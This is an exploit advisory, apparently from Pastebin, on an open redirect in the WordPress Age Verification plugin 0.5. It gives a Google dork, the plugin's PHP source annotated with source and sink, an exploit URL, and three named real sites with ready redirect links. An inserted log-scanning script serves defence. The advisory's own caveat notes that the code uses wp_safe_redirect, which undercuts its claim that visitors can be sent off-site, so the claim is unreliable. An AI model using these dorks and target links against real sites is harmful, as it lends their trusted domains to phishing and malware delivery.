WordPress 5.0.4 Age-Verification Plugins 0.5 Open Redirect
KingSkrupellos
Mar 21st, 2019
############################################################################################

# Exploit Title : WordPress 5.0.4 Age-Verification Plugin 0.5 Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/03/2019
# Vendor Homepages : coveredweb.com - coveredwebservices.com
# Software Download Link : downloads.wordpress.org/plugin/age-verification.zip
# Software Information Links :
wordpress.org/plugins/tags/age-verification/
txfx.net/wordpress-plugins/
profiles.wordpress.org/markjaquith/
# Software Affected Versions :
Plugin versions 0.4 and 0.5 are vulnerable; tested against WordPress 4.9.10 through 5.0.4 (older WordPress releases are expected to behave the same)
The plugin requires at least WordPress 3.2 (3.3.1 and higher also listed)
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/wp-content/plugins/age-verification/
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019030183

############################################################################################

# Information About Software :
****************************
Requires users to provide their date of birth before they can access your site.

This plugin forces users to provide their date of birth before they can access your site.
Their age must meet some configurable age. Their age will be remembered in a cookie that will
last for a configurable duration.

Plain text fields or dropdown fields can be configured. The interface is bare -- it is expected
that you will do some work to integrate this into your site's design. You can also exclude
registered users from the age check (for instance, so authors aren't subjected to it).

############################################################################################

# Impact :
***********
The plugin ships a standalone endpoint, age-verification.php, that can be requested directly
(it bootstraps WordPress on its own by including wp-config.php). That endpoint reads a
redirect_to parameter from the request, echoes it into a hidden field of the date-of-birth
form and, once the visitor submits any date that passes the plugin's format check, hands the
value to a redirect call. The plugin applies no check of its own that ties the value to the
site's own pages, so an attacker can pre-fill it with an external URL.

That turns a link on the legitimate domain into a hop to an attacker-controlled page: the
visitor sees the real site's hostname in the link they click and in the age form they fill
in, then lands on a look-alike login or payment page or on a malware download. Open redirects
of this kind (CWE-601) are used mainly to lend credibility to phishing and malware-delivery
links, because both URL reputation filters and users judge the link by the host they can see,
which here is the trusted one.

Caveat for verifiers: in the 0.5 source below the final hop goes through wp_safe_redirect(),
which WordPress core limits to the site's own host plus any hosts added through the
allowed_redirect_hosts filter, falling back to the admin URL otherwise. Before listing a site
as affected, confirm that the POST really answers with a 3xx whose Location header points at
the external host rather than back at the site itself.
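For the defensive side of the same mechanism, here is an added example (not from the advisory or from the plugin): a scanner over Apache/nginx combined-format access logs that flags GET requests seeding age-verification.php with a redirect_to whose host is not the site's own. The log lines are constructed for the demo, and the vhost name shop.example is an assumption.

```python
"""Flag redirect_to abuse of age-verification.php in combined-format access logs.

Added example, not taken from the advisory or from the plugin. The log lines
below are constructed for the demo and the site host name shop.example is an
assumption; point find_redirect_abuse() at your own log text and vhost.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
PLUGIN_FILE = "/age-verification/age-verification.php"

# Constructed sample: one legitimate same-site redirect_to, two off-site seeds
# (one absolute, one protocol-relative), the follow-up POST and an unrelated hit.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Mar/2019:10:01:02 +0000] "GET /wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fshop.example%2Fbeer%2F HTTP/1.1" 200 1450 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Mar/2019:10:02:15 +0000] "GET /wp-content/plugins/age-verification/age-verification.php?redirect_to=https%3A%2F%2Fcxsecurity.com%2F HTTP/1.1" 200 1450 "-" "curl/7.64.0"
198.51.100.9 - - [21/Mar/2019:10:02:16 +0000] "POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1" 302 0 "-" "curl/7.64.0"
192.0.2.44 - - [21/Mar/2019:10:05:40 +0000] "GET /wp-content/plugins/age-verification/age-verification.php?notoldenough=1&redirect_to=%2F%2Fphish.example%2Flogin HTTP/1.1" 200 1450 "-" "Mozilla/5.0"
192.0.2.45 - - [21/Mar/2019:10:06:00 +0000] "GET /beer/ HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""


def offsite_redirect_target(path, site_host):
    """Return the host named in redirect_to when it is not site_host, else None."""
    parts = urlsplit(path)
    if not parts.path.endswith(PLUGIN_FILE):
        return None
    values = parse_qs(parts.query).get("redirect_to")   # parse_qs also percent-decodes
    if not values:
        return None
    target = values[0].strip()
    if target.startswith("//"):                          # protocol-relative still leaves the site
        target = "http:" + target
    host = urlsplit(target).hostname
    if host and host.lower() != site_host.lower():
        return host.lower()
    return None


def find_redirect_abuse(log_text, site_host):
    """List (ip, timestamp, target_host) for every GET that seeds an off-site redirect_to."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        host = offsite_redirect_target(m["path"], site_host)
        if host:
            hits.append((m["ip"], m["ts"], host))
    return hits


if __name__ == "__main__":
    for ip, ts, host in find_redirect_abuse(SAMPLE_LOG, "shop.example"):
        print(f"{ts} {ip} seeded age-verification redirect_to -> {host}")
```

The scanner only sees the seeding GET; the POST that actually triggers the redirect carries redirect_to in the body, which access logs do not record, so correlate the GET's client IP with the 302 that follows it from the same address.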

############################################################################################

# Vulnerable Source Code : [ age-verification.php ]
*********************************************
<?php
/*
Plugin Name: Age Verification
Description: Verifies a visitor's age before any pages can be viewed
Version: 0.5
Author: Mark Jaquith
Author URI: http://coveredwebservices.com/
*/

/*
Copyright 2008-2012 Mark Jaquith

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

if ( !defined( 'ABSPATH' ) ) { // we're being called directly, for age verification

    if ( file_exists('../../wp-config.php') )
        include('../../wp-config.php');
    elseif ( file_exists('../../../wp-config.php') )
        include('../../../wp-config.php');
    else
        die('Could not find wp-config.php');

    if ( $_POST ) {
        foreach ( array( 'year', 'month', 'day' ) as $unit )
            $_POST['age_' . $unit] = absint( ltrim( $_POST['age_' . $unit], '0' ) );
        if (
            $_POST['age_year'] < 1900 ||
            $_POST['age_month'] < 1 ||
            $_POST['age_month'] > 12 ||
            $_POST['age_day'] < 1 ||
            $_POST['age_day'] > 31
        ) {
            // Bad format: bounce back to this same file, carrying redirect_to along in the query string
            wp_redirect( cws_age_verification::plugin_url() . '?wrongformat=1&redirect_to=' . urlencode( stripslashes( $_POST['redirect_to'] ) ) );
            die();
        }
        $dob = $_POST['age_year'] . '-' . zeroise( $_POST['age_month'], 2 ) . '-' . zeroise( $_POST['age_day'], 2 );
        cws_age_verification::set_dob($dob);
        // SINK: the redirect target is taken straight from the POST body. No age comparison happens here,
        // so any date that passed the format check above reaches this redirect.
        wp_safe_redirect( $_POST['redirect_to'] );
        die();
    } else { ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Age Verification Required</title>
</head>
<body>
<h1>Age Verification Required</h1>
<?php if ( !$_COOKIE['cws_age_verification_cookie_check'] ) : ?>
<p>This site requires your date of birth, but your browser isn't accepting cookies. Please enable cookies and try visiting this site again.</p>
<?php cws_age_verification::footer(); ?>
<?php endif; ?>
<?php if ( $_GET['notoldenough'] ) : ?>
<p><strong>You are not old enough to access this site!</strong></p>
<?php elseif ( $_GET['wrongformat'] ) : ?>
<p><strong>Your date of birth must be in the format <code>MM DD YYYY</code> and must be a valid date!</strong></p>
<?php endif; ?>
<p>You must be <?php echo cws_age_verification::age_required(); ?> years old to access this site. Please provide your date of birth:</p>
<form action="" method="post">
<?php // SOURCE: redirect_to comes from $_REQUEST (query string, body or cookie). clean_url() only escapes it for the attribute; it does not restrict the host. ?>
<input type="hidden" name="redirect_to" value="<?php echo clean_url( stripslashes( $_REQUEST['redirect_to'] ) ); ?>" />
<?php if ( get_option( 'cws_age_verification_use_dropdowns ' ) ) : ?>
<select name="age_month">
<?php
for ( $i=1; $i<13; $i++ )
    echo '<option value="' . $i . '">' . gmdate( 'F', gmmktime( 0, 0, 0, $i, 1, 0 ) ) . '</option>';
?>
</select>
<select name="age_day">
<?php
for ( $i=1; $i<32; $i++ )
    echo '<option value="' . zeroise( $i, 2 ) . '">' . zeroise( $i, 2 ) . '</option>';
?>
</select>
<select name="age_year">
<?php
for ( $i = date('Y'); $i > date('Y') - 110; $i-- )
    echo '<option value="' . $i . '">' . $i . '</option>';
?>
</select>
<?php else : // plain text inputs ?>
<input name="age_month" type="text" maxlength="2" value="MM" onfocus="this.value='';" style="width: 2em;" />
<input name="age_day" type="text" maxlength="2" value="DD" onfocus="this.value='';" style="width: 2em;" />
<input name="age_year" type="text" maxlength="4" value="YYYY" onfocus="this.value='';" style="width: 4em;" />
<?php endif; ?>
<input type="submit" value="Verify Age &raquo;" />
</form>
<?php
        cws_age_verification::footer();
    }
}

class cws_age_verification {

    function footer() {
        echo "</body></html>";
        die();
    }

    function check() {
        if ( current_user_can( 'read' ) && get_option( 'cws_age_verification_skip_registered' ) ) {
            // nothing -- let them pass
        } elseif ( !$_COOKIE['cws_age_verification_dob'] ) {
            cws_age_verification::set_test();
            // Normal entry: redirect_to is built from the current host and request URI, so the legitimate value is always a same-site URL
            wp_redirect( cws_age_verification::plugin_url() . '?redirect_to=http://' . $_SERVER['HTTP_HOST'] . urlencode($_SERVER['REQUEST_URI'] ) );
            die();
        } elseif ( cws_age_verification::age_required() > cws_age_verification::dob_to_age( $_COOKIE['cws_age_verification_dob'] ) ) {
            cws_age_verification::set_test();
            wp_redirect( cws_age_verification::plugin_url() . '?notoldenough=1&redirect_to=http://' . $_SERVER['HTTP_HOST'] . urlencode($_SERVER['REQUEST_URI'] ) );
            die();
        } else {
            cws_age_verification::set_dob( $_COOKIE['cws_age_verification_dob'] ); // keep-alive
        }
    }

    function plugin_url() {
        return get_option( 'siteurl' ) . '/' . PLUGINDIR . '/' . plugin_basename( __FILE__ );
    }

    function age_required() {
        return absint( get_option( 'cws_age_verification_age' ) );
    }

    function timeout_minutes() {
        return absint( get_option( 'cws_age_verification_timeout' ) );
    }

    function timeout_seconds() {
        return 60 * cws_age_verification::timeout_minutes();
    }

    function set_test() {
        setcookie( 'cws_age_verification_cookie_check', '1', time() + 3600, COOKIEPATH, COOKIE_DOMAIN );
        setcookie( 'cws_age_verification_cookie_check', '1', time() + 3600, SITECOOKIEPATH, COOKIE_DOMAIN );
    }

    function set_dob( $dob ) {
        setcookie( 'cws_age_verification_dob', $dob, time() + cws_age_verification::timeout_seconds(), COOKIEPATH, COOKIE_DOMAIN );
        setcookie( 'cws_age_verification_dob', $dob, time() + cws_age_verification::timeout_seconds(), SITECOOKIEPATH, COOKIE_DOMAIN );
    }

    function dob_to_age( $birthdate ) {
        // birthdate should be in yyyy-mm-dd form
        if ( $birthdate ) {
            $birth = date( 'Ymd', strtotime( $birthdate ) );
            $age = date( 'Y' ) - substr( $birth, 0, 4 );
            if ( date( 'md' ) < substr( $birth, 4, 4 ) )
                --$age;
            return $age;
        }
    }

    function admin() {
        if ( !empty( $_POST ) ) {
            if ( function_exists( 'current_user_can' ) && !current_user_can( 'manage_options' ) )
                die( __( 'Cheatin&#8217; uh?' ) );
            check_admin_referer( 'cws-age-verification-update-settings' );
            update_option( 'cws_age_verification_age', absint( $_POST['cws-age-setting'] ) );
            update_option( 'cws_age_verification_timeout', absint( $_POST['cws-timeout-setting'] ) );
            update_option( 'cws_age_verification_skip_registered', ( $_POST['cws-registered-setting'] ) ? '1' : '0' );
            update_option( 'cws_age_verification_use_dropdowns', ( $_POST['cws-dropdown-setting'] ) ? '1' : '0' );
        }
        if ( !empty($_POST ) ) { ?>
<div id="message" class="updated fade"><p><strong><?php _e( 'Options saved.' ) ?></strong></p></div>
<?php } ?>
<div class="wrap">
<h2>Age Verification Settings</h2>
<form action="" method="post" id="age-verification-settings">
<?php wp_nonce_field( 'cws-age-verification-update-settings' ); ?>
<p>Users must be at least <input style="width:2em;" type="text" name="cws-age-setting" value="<?php echo attribute_escape( cws_age_verification::age_required() ); ?>" maxlength="2" /> years old to access this site, and will have to reverify their age after <input style="width:4em;" type="text" name="cws-timeout-setting" value="<?php echo attribute_escape( cws_age_verification::timeout_minutes() ); ?>" maxlength="4" /> minutes of inactivity.</p>
<p><input type="checkbox" <?php checked( get_option( 'cws_age_verification_skip_registered' ), '1' ); ?> value="1" name="cws-registered-setting" id="cws-registered-setting" /> <label for="cws-registered-setting">Logged in users of this site do not have to verify their age.</label></p>
<p>Age verification should use <select name="cws-dropdown-setting"><option value="1" <?php selected( get_option( 'cws_age_verification_use_dropdowns' ), '1' ); ?>>dropdown</option><option value="0" <?php selected( get_option( 'cws_age_verification_use_dropdowns' ), '0' ); ?>>plain text</option></select> inputs.</p>
<p class="submit"><input type="submit" value="Save options &raquo;" /></p>
</form>
</div>
<?php
    }

}

function cws_age_verification_admin() {
    add_option( 'cws_age_verification_age', '13' ); // default to 13 because of COPPA
    add_option( 'cws_age_verification_timeout', '60' ); // one hour
    add_option( 'cws_age_verification_skip_registered', '1' );
    add_option( 'cws_age_verification_use_dropdowns', '1' );
    if ( function_exists( 'add_submenu_page' ) )
        add_submenu_page( 'plugins.php', 'Age Verification', 'Age Verification Settings', 'manage_options', 'age-verification', array( 'cws_age_verification', 'admin' ) );
}

add_action( 'init', create_function( '$a', "add_action( 'admin_menu', 'cws_age_verification_admin' );" ) );
add_action( 'template_redirect', array( 'cws_age_verification', 'check' ) );

?>

############################################################################################

# Vulnerable File :
****************
/wp-content/plugins/age-verification/age-verification.php

# Vulnerable Parameter :
**********************
?redirect_to=

?notoldenough=1&redirect_to=

# Choose =>
************
Day 1 - Month 1 - Year 1900

Any other date works just as well: the POST handler only checks that the year is 1900 or later,
the month is 1-12 and the day is 1-31, then sets the cookie and redirects to whatever redirect_to
holds. The "not old enough" comparison is made later against the cookie, not at submission time.

# Open Redirection Exploit :
***************************
/wp-content/plugins/age-verification/age-verification.php?redirect_to=https://www.[REDIRECTION-ADDRESS].gov

Open the link, submit the form with a valid date and inspect the Location header of the response to the POST.

############################################################################################

# Example Vulnerable Sites :
*************************
[+] paulanerhpusa.com/paulanerhpusa_wp/wp-content/plugins/age-verification/age-verification.php?redirect_to=https://cxsecurity.com/

[+] siebrand.nl/wp-content/plugins/age-verification/age-verification.php?notoldenough=1&redirect_to=https://cxsecurity.com/

[+] reggiani.ind.br/wp-content/plugins/age-verification/age-verification.php?notoldenough=1&redirect_to=https://cxsecurity.com/

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################